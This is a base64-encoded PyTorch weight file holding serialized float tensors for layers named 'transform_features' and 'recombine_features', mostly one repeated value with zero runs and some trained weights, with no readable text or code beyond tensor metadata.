PLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4l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